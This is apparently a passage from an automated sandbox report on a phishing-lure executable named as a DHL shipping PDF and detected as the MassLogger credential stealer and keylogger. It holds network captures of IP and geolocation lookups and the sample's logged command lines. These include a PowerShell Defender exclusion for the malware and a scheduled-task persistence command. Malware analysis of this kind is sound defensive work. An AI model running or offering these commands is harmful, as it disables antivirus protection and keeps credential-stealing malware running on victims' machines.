Mar 12, 2025 19:08:13.330125093 CET	192.168.2.7	1.1.1.1	0xdffa	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Mar 12, 2025 19:08:14.296742916 CET	192.168.2.7	1.1.1.1	0xb7ce	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 12, 2025 19:08:13.337186098 CET	1.1.1.1	192.168.2.7	0xdffa	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 12, 2025 19:08:13.337186098 CET	1.1.1.1	192.168.2.7	0xdffa	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Mar 12, 2025 19:08:13.337186098 CET	1.1.1.1	192.168.2.7	0xdffa	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Mar 12, 2025 19:08:13.337186098 CET	1.1.1.1	192.168.2.7	0xdffa	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Mar 12, 2025 19:08:13.337186098 CET	1.1.1.1	192.168.2.7	0xdffa	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Mar 12, 2025 19:08:13.337186098 CET	1.1.1.1	192.168.2.7	0xdffa	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Mar 12, 2025 19:08:14.304152012 CET	1.1.1.1	192.168.2.7	0xb7ce	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Mar 12, 2025 19:08:14.304152012 CET	1.1.1.1	192.168.2.7	0xb7ce	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Mar 12, 2025 19:08:14.304152012 CET	1.1.1.1	192.168.2.7	0xb7ce	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Mar 12, 2025 19:08:14.304152012 CET	1.1.1.1	192.168.2.7	0xb7ce	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Mar 12, 2025 19:08:14.304152012 CET	1.1.1.1	192.168.2.7	0xb7ce	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Mar 12, 2025 19:08:14.304152012 CET	1.1.1.1	192.168.2.7	0xb7ce	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Mar 12, 2025 19:08:14.304152012 CET	1.1.1.1	192.168.2.7	0xb7ce	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49684	132.226.247.73	80	5608	C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

Timestamp	Bytes transferred	Direction	Data
Mar 12, 2025 19:08:13.359039068 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Mar 12, 2025 19:08:14.044418097 CET	273	IN	HTTP/1.1 200 OK Date: Wed, 12 Mar 2025 18:08:13 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Mar 12, 2025 19:08:14.083157063 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Mar 12, 2025 19:08:14.291591883 CET	273	IN	HTTP/1.1 200 OK Date: Wed, 12 Mar 2025 18:08:14 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49686	132.226.247.73	80	7156	C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe

Timestamp	Bytes transferred	Direction	Data
Mar 12, 2025 19:08:16.966424942 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Mar 12, 2025 19:08:17.643527985 CET	273	IN	HTTP/1.1 200 OK Date: Wed, 12 Mar 2025 18:08:17 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Mar 12, 2025 19:08:17.670718908 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Mar 12, 2025 19:08:17.877087116 CET	273	IN	HTTP/1.1 200 OK Date: Wed, 12 Mar 2025 18:08:17 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49685	104.21.48.1	443	5608	C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-12 18:08:17 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-03-12 18:08:17 UTC	861	IN	HTTP/1.1 200 OK Date: Wed, 12 Mar 2025 18:08:17 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 211369 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Mon, 10 Mar 2025 07:25:27 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FLIwmQkI%2FulPjRdxfQ4c7GBiqLhBOKGZPIS8%2BSqFLgPqE20LAya86PUV2H5sjrCybNAJcFo7J%2BAT%2F1Jpbt7uht8%2FvoCwhmTMCIsqbJGmnqvoxOhPLtW953uBcsugWpNOysF6sdqd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91f53c6c1836e822-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=22458&min_rtt=14846&rtt_var=17346&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4250&recv_bytes=699&delivery_rate=60712&cwnd=208&unsent_bytes=0&cid=4650487258e25e47&ts=1496&x=0"
2025-03-12 18:08:17 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49687	104.21.48.1	443	7156	C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-12 18:08:19 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-03-12 18:08:20 UTC	865	IN	HTTP/1.1 200 OK Date: Wed, 12 Mar 2025 18:08:20 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 211372 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Mon, 10 Mar 2025 07:25:27 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GVs%2FvkOrwSxdQZZPUIN0ANMwoV1B3%2BMrBX1tZPPAyanke%2F7Bsh7RQ82oJ%2Bzo7eYVwijFdPSXKcK44o9ZP4c5%2F6iuRl%2BIdtnQGhB1g2%2F0xzSPPVWpBhTeaPK4YexRibLWz3DW9OUc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91f53c7cfc205079-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=170011&min_rtt=30649&rtt_var=96969&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=94489&cwnd=251&unsent_bytes=0&cid=4c331bf2110cfae2&ts=533&x=0"
2025-03-12 18:08:20 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Target ID:	0
Start time:	14:08:09
Start date:	12/03/2025
Path:	C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe"
Imagebase:	0x750000
File size:	592'392 bytes
MD5 hash:	FD2765443B95B23C0AB9FA091A6182AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.970358836.0000000003B0A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.970358836.0000000003B0A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000000.00000002.970358836.0000000003B0A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.970358836.0000000003B0A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.970358836.0000000003B0A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	14:08:11
Start date:	12/03/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe"
Imagebase:	0xf60000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	14:08:11
Start date:	12/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff642da0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	14:08:11
Start date:	12/03/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe"
Imagebase:	0xf60000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	14:08:11
Start date:	12/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff642da0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	14:08:11
Start date:	12/03/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PZgkJsntUXo" /XML "C:\Users\user\AppData\Local\Temp\tmp2454.tmp"
Imagebase:	0xc10000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	14:08:11
Start date:	12/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff642da0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	14:08:11
Start date:	12/03/2025
Path:	C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe"
Imagebase:	0xd0000
File size:	592'392 bytes
MD5 hash:	FD2765443B95B23C0AB9FA091A6182AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	14:08:11
Start date:	12/03/2025
Path:	C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe"
Imagebase:	0x5d0000
File size:	592'392 bytes
MD5 hash:	FD2765443B95B23C0AB9FA091A6182AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2179384145.0000000002A04000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	14:08:13
Start date:	12/03/2025
Path:	C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe
Imagebase:	0xe50000
File size:	592'392 bytes
MD5 hash:	FD2765443B95B23C0AB9FA091A6182AA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000009.00000002.1006393275.00000000042CA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1006393275.00000000042CA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000009.00000002.1006393275.00000000042CA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.1006393275.00000000042CA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.1006393275.00000000042CA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 34%, ReversingLabs Detection: 51%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	14:08:13
Start date:	12/03/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff69c330000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	14:08:15
Start date:	12/03/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PZgkJsntUXo" /XML "C:\Users\user\AppData\Local\Temp\tmp3358.tmp"
Imagebase:	0xc10000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	14:08:15
Start date:	12/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff642da0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	14:08:15
Start date:	12/03/2025
Path:	C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe"
Imagebase:	0xdd0000
File size:	592'392 bytes
MD5 hash:	FD2765443B95B23C0AB9FA091A6182AA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000D.00000002.2175351125.0000000000409000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.2175351125.0000000000409000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 0000000D.00000002.2175351125.0000000000409000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000D.00000002.2175351125.0000000000409000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000D.00000002.2175351125.0000000000409000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.2179488891.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	14:08:37
Start date:	12/03/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7c8b00000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: MassLogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PZgkJsntUXo.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_enmsleo5.f2b.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hquz2vx3.0yx.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kijy0n2n.bl3.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pihdjnbo.yfl.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sezybrh3.sfo.psm1

Windows Analysis Report
DHL Shipping Details Ref ID 446331798008765975594-pdf.exe